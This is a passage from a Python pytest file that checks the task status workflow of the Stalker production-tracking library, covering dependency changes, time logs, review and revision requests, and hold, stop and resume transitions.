self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_CMPL_task(self):
self.test_task3.depends = []
self.test_task9.status = self.status_wip
assert (self.test_task9.status == self.status_wip)
self.test_task3.depends.append(self.test_task9)
assert (self.test_task3.status == self.status_wfd)
self.test_task8.status = self.status_cmpl
assert (self.test_task8.status == self.status_cmpl)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_WFD_task_task(self):
self.test_task3.depends = []
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task8.status = self.status_wfd
assert (self.test_task8.status == self.status_wfd)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_RTS_task(self):
self.test_task3.depends = []
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task8.status = self.status_rts
assert (self.test_task8.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_WIP_task(self):
self.test_task3.depends = []
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task8.status = self.status_wip
assert (self.test_task8.status == self.status_wip)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_PREV_task(self):
self.test_task3.depends = []
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task8.status = self.status_prev
assert (self.test_task8.status == self.status_prev)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_HREV_task(self):
self.test_task3.depends = []
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task8.status = self.status_hrev
assert (self.test_task8.status == self.status_hrev)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_OH_task(self):
self.test_task3.depends = []
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task8.status = self.status_oh
assert (self.test_task8.status == self.status_oh)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_STOP_task(self):
self.test_task3.depends = []
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task8.status = self.status_stop
assert (self.test_task8.status == self.status_stop)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_rts)
def test_leaf_RTS_task_updated_to_have_a_dependency_of_CMPL_task(self):
assert (self.test_task3.depends == [])
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task8.status = self.status_cmpl
assert (self.test_task8.status == self.status_cmpl)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_rts)
def test_leaf_WIP_task_dependency_can_not_be_updated(self):
self.test_task3.depends = []
self.test_task3.status = self.status_wip
assert (self.test_task3.status == self.status_wip)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a WIP task and it is not allowed to change the dependencies of a WIP task')
def test_leaf_PREV_task_dependency_can_not_be_updated(self):
self.test_task3.depends = []
self.test_task3.status = self.status_prev
assert (self.test_task3.status == self.status_prev)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a PREV task and it is not allowed to change the dependencies of a PREV task')
def test_leaf_HREV_task_dependency_can_not_be_updated(self):
self.test_task3.depends = []
self.test_task3.status = self.status_hrev
assert (self.test_task3.status == self.status_hrev)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a HREV task and it is not allowed to change the dependencies of a HREV task')
def test_leaf_DREV_task_dependency_can_not_be_updated(self):
self.test_task3.depends = []
self.test_task3.status = self.status_drev
assert (self.test_task3.status == self.status_drev)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a DREV task and it is not allowed to change the dependencies of a DREV task')
def test_leaf_OH_task_dependency_can_not_be_updated(self):
self.test_task3.depends = []
self.test_task3.status = self.status_oh
assert (self.test_task3.status == self.status_oh)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a OH task and it is not allowed to change the dependencies of a OH task')
def test_leaf_STOP_task_dependency_can_not_be_updated(self):
self.test_task3.depends = []
self.test_task3.status = self.status_stop
assert (self.test_task3.status == self.status_stop)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a STOP task and it is not allowed to change the dependencies of a STOP task')
def test_leaf_CMPL_task_dependency_can_not_be_updated(self):
self.test_task3.depends = []
self.test_task3.status = self.status_cmpl
assert (self.test_task3.status == self.status_cmpl)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a CMPL task and it is not allowed to change the dependencies of a CMPL task')
def test_container_RTS_task_updated_to_have_a_dependency_of_WFD_task_task(self):
self.test_task3.depends = []
self.test_task8.status = self.status_wfd
assert (self.test_task8.status == self.status_wfd)
self.test_task3.children.append(self.test_task2)
self.test_task2.status = self.status_rts
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_RTS_task(self):
self.test_task3.depends = []
self.test_task8.status = self.status_rts
assert (self.test_task8.status == self.status_rts)
self.test_task3.children.append(self.test_task2)
self.test_task2.status = self.status_rts
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_WIP_task(self):
self.test_task3.depends = []
self.test_task8.status = self.status_wip
assert (self.test_task8.status == self.status_wip)
self.test_task3.children.append(self.test_task2)
self.test_task2.status = self.status_rts
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_PREV_task(self):
self.test_task3.depends = []
self.test_task8.status = self.status_prev
assert (self.test_task8.status == self.status_prev)
self.test_task3.children.append(self.test_task2)
self.test_task2.status = self.status_rts
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_HREV_task(self):
self.test_task3.depends = []
self.test_task8.status = self.status_hrev
assert (self.test_task8.status == self.status_hrev)
self.test_task3.children.append(self.test_task2)
self.test_task2.status = self.status_rts
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_OH_task(self):
self.test_task3.depends = []
self.test_task8.status = self.status_oh
assert (self.test_task8.status == self.status_oh)
self.test_task3.children.append(self.test_task2)
self.test_task2.status = self.status_rts
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_container_RTS_task_updated_to_have_a_dependency_of_STOP_task(self):
self.test_task3.depends = []
self.test_task8.status = self.status_stop
assert (self.test_task8.status == self.status_stop)
self.test_task3.children.append(self.test_task2)
self.test_task2.status = self.status_rts
self.test_task3.status = self.status_rts
assert (self.test_task3.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_rts)
def test_container_WIP_task_dependency_can_not_be_updated(self):
self.test_task1.depends = []
self.test_task1.status = self.status_wip
assert (self.test_task1.status == self.status_wip)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task1.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a WIP task and it is not allowed to change the dependencies of a WIP task')
def test_container_CMPL_task_dependency_can_not_be_updated(self):
self.test_task1.status = self.status_cmpl
assert (self.test_task1.status == self.status_cmpl)
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task1.depends.append(self.test_task8)
assert (str(cm.value) == 'This is a CMPL task and it is not allowed to change the dependencies of a CMPL task')
def test_create_time_log_in_WFD_leaf_task(self):
self.test_task3.status = self.status_wfd
resource = self.test_task3.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.create_time_log(resource, start, end)
assert (str(cm.value) == 'Test Task 3 is a WFD task, and it is not allowed to create TimeLogs for a WFD task, please supply a RTS, WIP, HREV or DREV task!')
def test_create_time_log_in_RTS_leaf_task_status_updated_to_WIP(self):
self.test_task9.status = self.status_rts
resource = self.test_task9.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
self.test_task9.create_time_log(resource, start, end)
assert (self.test_task9.status == self.status_wip)
def test_create_time_log_in_RTS_leaf_task_update_parent_status(self):
self.test_task2.status = self.status_rts
self.test_task8.status = self.status_rts
assert (self.test_task8.parent == self.test_task2)
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
self.test_task8.create_time_log(resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
assert (self.test_task8.status == self.status_wip)
assert (self.test_task2.status == self.status_wip)
def test_create_time_log_in_RTS_root_task_no_parent_no_problem(self):
self.test_task3.status = self.status_rts
resource = self.test_task3.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
self.test_task3.create_time_log(resource, start, end)
assert (self.test_task3.status == self.status_wip)
def test_create_time_log_in_WIP_leaf_task(self):
self.test_task9.status = self.status_wip
resource = self.test_task9.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
self.test_task9.create_time_log(resource, start, end)
assert (self.test_task9.status == self.status_wip)
def test_create_time_log_in_PREV_leaf_task(self):
self.test_task3.status = self.status_prev
resource = self.test_task3.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
assert (self.test_task3.status == self.status_prev)
tlog = self.test_task3.create_time_log(resource, start, end)
from stalker import TimeLog
assert isinstance(tlog, TimeLog)
assert (self.test_task3.status == self.status_prev)
def test_create_time_log_in_HREV_leaf_task(self):
self.test_task9.status = self.status_hrev
resource = self.test_task9.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
self.test_task9.create_time_log(resource, start, end)
assert (self.test_task9.status == self.status_wip)
def test_create_time_log_in_DREV_leaf_task(self):
self.test_task9.status = self.status_drev
resource = self.test_task9.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
self.test_task9.create_time_log(resource, start, end)
assert (self.test_task9.status == self.status_drev)
def test_create_time_log_in_OH_leaf_task(self):
self.test_task9.status = self.status_oh
resource = self.test_task9.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task9.create_time_log(resource, start, end)
assert (str(cm.value) == 'Test Task 9 is a OH task, and it is not allowed to create TimeLogs for a OH task, please supply a RTS, WIP, HREV or DREV task!')
def test_create_time_log_in_STOP_leaf_task(self):
self.test_task9.status = self.status_stop
resource = self.test_task9.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task9.create_time_log(resource, start, end)
assert (str(cm.value) == 'Test Task 9 is a STOP task, and it is not allowed to create TimeLogs for a STOP task, please supply a RTS, WIP, HREV or DREV task!')
def test_create_time_log_in_CMPL_leaf_task(self):
self.test_task9.status = self.status_cmpl
resource = self.test_task9.resources[0]
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task9.create_time_log(resource, start, end)
assert (str(cm.value) == 'Test Task 9 is a CMPL task, and it is not allowed to create TimeLogs for a CMPL task, please supply a RTS, WIP, HREV or DREV task!')
def test_create_time_log_on_container_task(self):
start = datetime.datetime.now(pytz.utc)
end = (datetime.datetime.now(pytz.utc) + datetime.timedelta(hours=1))
self.test_task2.id = 36
with pytest.raises(ValueError) as cm:
self.test_task2.create_time_log(resource=None, start=start, end=end)
assert (str(cm.value) == 'Test Task 2 (id: 36) is a container task, and it is not allowed to create TimeLogs for a container task')
def test_create_time_log_is_creating_time_logs(self):
assert (len(self.test_task3.time_logs) == 0)
now = datetime.datetime.now(pytz.utc)
self.test_task3.create_time_log(resource=self.test_task3.resources[0], start=now, end=(now + datetime.timedelta(hours=1)))
assert (len(self.test_task3.time_logs) == 1)
assert (self.test_task3.total_logged_seconds == 3600)
now = datetime.datetime.now(pytz.utc)
self.test_task3.create_time_log(resource=self.test_task3.resources[0], start=(now + datetime.timedelta(hours=1)), end=(now + datetime.timedelta(hours=2)))
assert (len(self.test_task3.time_logs) == 2)
assert (self.test_task3.total_logged_seconds == 7200)
def test_create_time_log_returns_time_log_instance(self):
assert (len(self.test_task3.time_logs) == 0)
now = datetime.datetime.now(pytz.utc)
tl = self.test_task3.create_time_log(resource=self.test_task3.resources[0], start=now, end=(now + datetime.timedelta(hours=1)))
from stalker import TimeLog
assert isinstance(tl, TimeLog)
def test_request_review_in_WFD_leaf_task(self):
self.test_task3.status = self.status_wfd
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_review()
assert (str(cm.value) == 'Test Task 3 (id:37) is a WFD task, and WFD tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_RTS_leaf_task(self):
self.test_task3.status = self.status_rts
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_review()
assert (str(cm.value) == 'Test Task 3 (id:37) is a RTS task, and RTS tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_PREV_leaf_task(self):
self.test_task3.status = self.status_prev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_review()
assert (str(cm.value) == 'Test Task 3 (id:37) is a PREV task, and PREV tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_HREV_leaf_task(self):
self.test_task3.status = self.status_hrev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_review()
assert (str(cm.value) == 'Test Task 3 (id:37) is a HREV task, and HREV tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_DREV_leaf_task(self):
self.test_task3.status = self.status_drev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_review()
assert (str(cm.value) == 'Test Task 3 (id:37) is a DREV task, and DREV tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_OH_leaf_task(self):
self.test_task3.status = self.status_oh
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_review()
assert (str(cm.value) == 'Test Task 3 (id:37) is a OH task, and OH tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_STOP_leaf_task(self):
self.test_task3.status = self.status_stop
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_review()
assert (str(cm.value) == 'Test Task 3 (id:37) is a STOP task, and STOP tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_CMPL_leaf_task(self):
self.test_task3.status = self.status_cmpl
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_review()
assert (str(cm.value) == 'Test Task 3 (id:37) is a CMPL task, and CMPL tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_revision_in_WFD_leaf_task(self):
self.test_task3.status = self.status_wfd
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_revision()
assert (str(cm.value) == 'Test Task 3 (id: 37) is a WFD task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_RTS_leaf_task(self):
self.test_task3.status = self.status_rts
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_revision()
assert (str(cm.value) == 'Test Task 3 (id: 37) is a RTS task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_WIP_leaf_task(self):
self.test_task3.status = self.status_wip
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_revision()
assert (str(cm.value) == 'Test Task 3 (id: 37) is a WIP task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_HREV_leaf_task(self):
self.test_task3.status = self.status_hrev
self.test_task3.id = 37
kw = {'reviewer': self.test_user1, 'description': 'do something uleyn', 'schedule_timing': 4, 'schedule_unit': 'h'}
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_revision(**kw)
assert (str(cm.value) == 'Test Task 3 (id: 37) is a HREV task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_OH_leaf_task(self):
self.test_task3.status = self.status_oh
self.test_task3.id = 37
kw = {'reviewer': self.test_user1, 'description': 'do something uleyn', 'schedule_timing': 4, 'schedule_unit': 'h'}
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_revision(**kw)
assert (str(cm.value) == 'Test Task 3 (id: 37) is a OH task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_STOP_leaf_task(self):
self.test_task3.status = self.status_stop
self.test_task3.id = 37
kw = {'reviewer': self.test_user1, 'description': 'do something uleyn', 'schedule_timing': 4, 'schedule_unit': 'h'}
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.request_revision(**kw)
assert (str(cm.value) == 'Test Task 3 (id: 37) is a STOP task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_hold_in_WFD_leaf_task(self):
self.test_task3.status = self.status_wfd
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.hold()
assert (str(cm.value) == 'Test Task 3 (id:37) is a WFD task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_RTS_leaf_task(self):
self.test_task3.status = self.status_rts
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.hold()
assert (str(cm.value) == 'Test Task 3 (id:37) is a RTS task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_WIP_leaf_task_status(self):
self.test_task3.status = self.status_wip
self.test_task3.hold()
assert (self.test_task3.status == self.status_oh)
def test_hold_in_WIP_leaf_task_schedule_values(self):
self.test_task3.status = self.status_wip
self.test_task3.hold()
assert (self.test_task3.schedule_timing == 10)
assert (self.test_task3.schedule_unit == 'd')
def test_hold_in_WIP_leaf_task(self):
self.test_task3.status = self.status_wip
self.test_task3.hold()
assert (self.test_task3.priority == 0)
def test_hold_in_PREV_leaf_task(self):
self.test_task3.status = self.status_prev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.hold()
assert (str(cm.value) == 'Test Task 3 (id:37) is a PREV task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_HREV_leaf_task(self):
self.test_task3.status = self.status_hrev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.hold()
assert (str(cm.value) == 'Test Task 3 (id:37) is a HREV task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_DREV_leaf_task_status_updated_to_OH(self):
self.test_task3.status = self.status_drev
self.test_task3.hold()
assert (self.test_task3.status == self.status_oh)
def test_hold_in_DREV_leaf_task_schedule_values_are_intact(self):
self.test_task3.status = self.status_drev
self.test_task3.hold()
assert (self.test_task3.schedule_timing == 10)
assert (self.test_task3.schedule_unit == 'd')
def test_hold_in_DREV_leaf_task_priority_set_to_0(self):
self.test_task3.status = self.status_drev
self.test_task3.hold()
assert (self.test_task3.priority == 0)
def test_hold_in_OH_leaf_task(self):
self.test_task3.status = self.status_oh
self.test_task3.hold()
assert (self.test_task3.status == self.status_oh)
def test_hold_in_STOP_leaf_task(self):
self.test_task3.status = self.status_stop
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.hold()
assert (str(cm.value) == 'Test Task 3 (id:37) is a STOP task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_CMPL_leaf_task(self):
self.test_task3.status = self.status_cmpl
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.hold()
assert (str(cm.value) == 'Test Task 3 (id:37) is a CMPL task, only WIP or DREV tasks can be set to On Hold')
def test_stop_in_WFD_leaf_task(self):
self.test_task3.status = self.status_wfd
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.stop()
assert (str(cm.value) == 'Test Task 3 (id:37)is a WFD task and it is not possible to stop a WFD task.')
def test_stop_in_RTS_leaf_task(self):
self.test_task3.status = self.status_rts
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.stop()
assert (str(cm.value) == 'Test Task 3 (id:37)is a RTS task and it is not possible to stop a RTS task.')
def test_stop_in_WIP_leaf_task_status_is_updated_to_STOP(self):
self.test_task3.status = self.status_wip
self.test_task3.hold()
assert (self.test_task3.status == self.status_oh)
def test_stop_in_WIP_leaf_task_schedule_values_clamped(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
self.test_task8.status = self.status_rts
from stalker import TimeLog
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
self.test_task8.status = self.status_wip
self.test_task8.stop()
assert (self.test_task8.schedule_timing == 2)
assert (self.test_task8.schedule_unit == 'h')
def test_stop_in_WIP_leaf_task_dependent_task_status_updated_from_WFD_to_RTS(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
self.test_task9.status = self.status_rts
self.test_task8.status = self.status_rts
self.test_task9.depends = [self.test_task8]
from stalker import TimeLog
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
self.test_task8.status = self.status_wip
self.test_task8.stop()
assert (self.test_task9.status == self.status_rts)
def test_stop_in_WIP_leaf_task_status_from_DREV_to_HREV(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
self.test_task9.status = self.status_rts
self.test_task8.status = self.status_cmpl
self.test_task9.depends = [self.test_task8]
from stalker import TimeLog
TimeLog(task=self.test_task9, resource=self.test_task9.resources[0], start=now, end=(now + td(hours=1)))
TimeLog(task=self.test_task9, resource=self.test_task9.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
self.test_task9.status = self.status_wip
self.test_task8.status = self.status_hrev
self.test_task9.status = self.status_drev
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=2)), end=(now + td(hours=3)))
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=4)), end=(now + td(hours=5)))
self.test_task8.status = self.status_wip
self.test_task8.stop()
assert (self.test_task9.status == self.status_hrev)
def test_stop_in_DREV_leaf_task_check_parent_status(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
from stalker import TimeLog
TimeLog(task=self.test_task9, resource=self.test_task9.resources[0], start=now, end=(now + td(hours=1)))
TimeLog(task=self.test_task8, resource=self.test_task9.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
self.test_task9.status = self.status_drev
self.test_task9.stop()
assert (self.test_task9.status == self.status_stop)
assert (self.test_asset1.status == self.status_cmpl)
def test_stop_in_PREV_leaf_task(self):
self.test_task3.status = self.status_prev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.stop()
assert (str(cm.value) == 'Test Task 3 (id:37)is a PREV task and it is not possible to stop a PREV task.')
def test_stop_in_HREV_leaf_task(self):
self.test_task3.status = self.status_hrev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.stop()
assert (str(cm.value) == 'Test Task 3 (id:37)is a HREV task and it is not possible to stop a HREV task.')
def test_stop_in_DREV_leaf_task_status_is_updated_to_STOP(self):
self.test_task3.status = self.status_drev
self.test_task3.stop()
assert (self.test_task3.status == self.status_stop)
def test_stop_in_DREV_leaf_task_schedule_values_are_clamped(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
self.test_task8.status = self.status_rts
from stalker import TimeLog
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=2)))
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=2)), end=(now + td(hours=4)))
self.test_task8.status = self.status_drev
self.test_task8.stop()
assert (self.test_task8.schedule_timing == 4)
assert (self.test_task8.schedule_unit == 'h')
def test_stop_in_DREV_leaf_task_parent_status(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
from stalker import TimeLog
TimeLog(task=self.test_task9, resource=self.test_task9.resources[0], start=now, end=(now + td(hours=1)))
TimeLog(task=self.test_task8, resource=self.test_task9.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
self.test_task9.status = self.status_wip
self.test_task9.stop()
assert (self.test_task9.status == self.status_stop)
assert (self.test_asset1.status == self.status_cmpl)
def test_stop_in_DREV_leaf_task_dependent_task_status_updated_from_WFD_to_RTS(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
self.test_task9.status = self.status_rts
self.test_task8.status = self.status_rts
self.test_task9.depends = [self.test_task8]
from stalker import TimeLog
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
self.test_task8.status = self.status_wip
self.test_task8.stop()
assert (self.test_task9.status == self.status_rts)
def test_stop_in_DREV_leaf_task_dependent_task_status_updated_from_DREV_to_HREV(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
self.test_task9.status = self.status_rts
self.test_task8.status = self.status_rts
self.test_task9.depends = [self.test_task8]
self.test_task9.status = self.status_drev
from stalker import TimeLog
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
self.test_task8.status = self.status_wip
self.test_task8.stop()
assert (self.test_task9.status == self.status_hrev)
def test_stop_in_OH_leaf_task(self):
self.test_task3.status = self.status_oh
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.stop()
assert (str(cm.value) == 'Test Task 3 (id:37)is a OH task and it is not possible to stop a OH task.')
def test_stop_in_STOP_leaf_task(self):
self.test_task3.status = self.status_stop
self.test_task3.stop()
assert (self.test_task3.status == self.status_stop)
def test_stop_in_CMPL_leaf_task(self):
self.test_task3.status = self.status_cmpl
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.stop()
assert (str(cm.value) == 'Test Task 3 (id:37)is a CMPL task and it is not possible to stop a CMPL task.')
def test_resume_in_WFD_leaf_task(self):
self.test_task3.status = self.status_wfd
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.resume()
assert (str(cm.value) == 'Test Task 3 (id:37) is a WFD task, and it is not suitable to be resumed, please supply an OH or STOP task')
def test_resume_in_RTS_leaf_task(self):
self.test_task3.status = self.status_rts
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.resume()
assert (str(cm.value) == 'Test Task 3 (id:37) is a RTS task, and it is not suitable to be resumed, please supply an OH or STOP task')
def test_resume_in_WIP_leaf_task(self):
self.test_task3.status = self.status_wip
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.resume()
